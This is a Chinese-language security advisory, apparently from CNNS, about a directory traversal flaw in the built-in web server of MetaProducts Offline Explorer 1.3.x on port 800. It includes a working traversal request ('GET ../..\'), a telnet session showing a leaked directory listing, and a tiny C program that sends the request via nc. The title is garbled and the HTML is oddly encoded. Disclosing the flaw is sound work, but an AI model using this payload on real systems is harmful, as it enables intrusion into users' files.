婕俺绦颍?
MetaProducts Offline Explorer
描述
你在使用Offline Explorer时,入侵者可能通过它浏览您的硬盘
详细
Offline Explorer是由MetaProducts公司发布的一个离线浏览器,它在默认情况将在您的系统的800端口启动一个HTTPD
Server,但这个Server没有仔细的验证用户可能提交的请求,使得远程入侵者可能利用这个服务来浏览您的硬盘上的目录结构。
这个漏洞将影响到以下版本的Offline Explorer
MetaProducts Offline Explorer 1.3.250
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
MetaProducts Offline Explorer 1.3.241
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
范例:
[
PP@Linux PP]$ telnet PP.cnns.net 800
Trying 192.168.0.1...
Connected to PP.cnns.net (192.168.0.1).
Escape character is ^].
GET ../..\ HTTP/1.1
HTTP/1.0 200 OK
Server: Web Downloader 4.1 (Win32)
Content-Type: text/
html
Content-Length: 5048
$#@60;html$#@62;$#@60;head$#@62;$#@60;title$#@62;../..\$#@60;/title$#@62;$#@60;/head$#@62;$#@60;body$#@62;$#@60;h3$#@62;Directory
of ../..\$#@60;/h3$#@62;$#@60;p$#@62;
$#@60;hr$#@62;$#@60;table$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;1696$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="MSDOS.SYS"$#@62;MSDOS.SYS
$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;1033$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="AUTOEXEC.BAT"$#@62;
AUTOEXEC.BAT$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;222390$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="IO.
SYS"$#@62;IO.SYS$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;29636$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="BOOTL
OG.TXT"$#@62;BOOTLOG T$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;img
src="/Folder.gif" valign=middle$#@62;
$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;0$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="WINDOWS"$#@62;WINDOWS$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;$#@60;td$#@62;$#@60;img
src="/Folder.gif" valign=middle$#@62;$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;0$#@60;/td$#@62;$#@60;td$#@62;$#@60;tt$#@62;$#@60;a
href="My
Documents"$#@62;My Documents$#@60;/a$#@62;$#@60;/td$#@62;$#@60;/tr$#@62;$#@60;tr$#@62;
...............
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
[drew@kung-fusion]$ cat $#@62; stupid.c $#@60;$#@60; unf
void main() { printf("GET ../..\\\ HTTP/1.1\n\n");
}
unf
[drew@kung-fusion]$ gcc stupid.c -o stupid
[drew@kung-fusion]$ ./stupid | nc lame.doze.box 800 $#@62; heh.html
[drew@kung-fusion]$ lynx heh.html
解决方案
CNNS将为您提供最好的网络
安全解决方案
相关站点
http://www.metaproducts.com/mpFrames.html
